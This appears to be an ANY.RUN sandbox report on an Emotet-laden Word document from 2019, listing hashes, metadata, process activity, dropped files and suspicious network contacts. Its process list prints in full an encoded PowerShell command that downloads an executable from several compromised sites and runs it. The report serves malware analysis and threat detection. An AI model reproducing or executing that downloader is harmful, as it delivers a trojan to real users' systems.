analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

pINCbMITwqcpKYXFmSjr

Full analysis: https://app.any.run/tasks/d7f596c0-ceee-4711-8fad-a6a9c2385a53
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 13:35:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Practical Concrete Hat, Subject: Bypass, Author: Linwood Moen, Keywords: Organized, Comments: functionalities, Template: Normal.dotm, Last Saved By: Roberto Howe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5:

1BC2B40D2F750E5260E00DA0123E04B2

SHA1:

96EB8C71743FF71C21673E16A41F846B0D0793FA

SHA256:

8B5DB5A8FB38B8AE91A42EF038D1A9404DC3237C57CBF208EC17CB80B3440DCD

SSDEEP:

3072:veGRyYtKgdzSrGtKyIwLx3B7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:veGRyYtKUzSSnLx3XzOYVHs2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • msptermsizes.exe (PID: 2976)
      • 178.exe (PID: 2488)
      • 178.exe (PID: 3048)
      • msptermsizes.exe (PID: 3036)

    • Emotet process was detected

      • 178.exe (PID: 3048)

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2704)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2704)
      • 178.exe (PID: 3048)

    • Creates files in the user directory

      • powershell.exe (PID: 2704)

    • Starts itself from another location

      • 178.exe (PID: 3048)

    • Executed via WMI

      • powershell.exe (PID: 2704)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2832)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2704)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2832)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Abernathy
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 196
Paragraphs: 1
Lines: 1
Company: Ortiz, Steuber and Mayer
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 168
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:18:00
CreateDate: 2019:10:09 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Roberto Howe
Template: Normal.dotm
Comments: functionalities
Keywords: Organized
Author: Linwood Moen
Subject: Bypass
Title: Practical Concrete Hat
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 178.exe no specs #EMOTET 178.exe msptermsizes.exe no specs msptermsizes.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\pINCbMITwqcpKYXFmSjr.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2704powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2488"C:\Users\admin\178.exe" C:\Users\admin\178.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3048--3a2e7ef0C:\Users\admin\178.exe
178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2976"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3036--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exemsptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 710
Read events
1 222
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6462.tmp.cvr
MD5:
SHA256:
2704powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CWM1AHODWJD64VLGRFOJ.temp
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F14544B.wmfwmf
MD5:49F2D0098E8993FD96825135A9945FD5
SHA256:D5A4D4F47E10D28B85CA15B873D4475946931A311F2D036E31105FE769EF3A1B
2832WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:39FB5468FDA3B01BD0E9143BDDE1AD47
SHA256:393278A7DB63645C7F839369F8814CEAEDDF2A87EF1F1DF0F612F76CA6BCDF91
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83A138C7.wmfwmf
MD5:4CE6C15C3432C917BB6C8CADD3199998
SHA256:2013AB3FC598693BC3C7D2281BBB1E265AFA9E573F9A84CFB66DBFCA3B7F37AA
2704powershell.exeC:\Users\admin\178.exeexecutable
MD5:537B74013A37BB5746F8F0CD9D54E7A0
SHA256:066D31CC0E6F45E89297334AAD69CCA12D60E9B4FE6AAD341D08BCF6BCE37C45
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D037FF91.wmfwmf
MD5:90D1531819477CA9D5D7EDD1BC9B26AB
SHA256:102DBE2A78CCB3026CA4EDC1A138B9AB669C04797880AE77A3771E5B8427159F
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4368703.wmfwmf
MD5:A9E1F897BA6545097BD994AD2A9E32AD
SHA256:8D00ACB3ADB296B8BCF6E5925D449F436F6CD386B31B05FE2A8F3228E897D0B9
2704powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:2550856BFB30312223D7C86BE8926334
SHA256:83ADCA78C6B60A6AF9835312DBBFEA52A0ECD6FAA7EABB279C5B1E1B71EB11F6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
7
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2704
powershell.exe
146.88.234.116:80
stephporn.com
PlanetHoster
FR
suspicious
2704
powershell.exe
35.238.93.185:443
e-centricity.com
US
unknown
2704
powershell.exe
43.255.154.26:443
thehopeherbal.com
GoDaddy.com, LLC
SG
suspicious

DNS requests

Domain
IP
Reputation
stephporn.com
  • 146.88.234.116
suspicious
thehopeherbal.com
  • 43.255.154.26
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared
e-centricity.com
  • 35.238.93.185
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
pINCbMITwqcpKYXFmSjr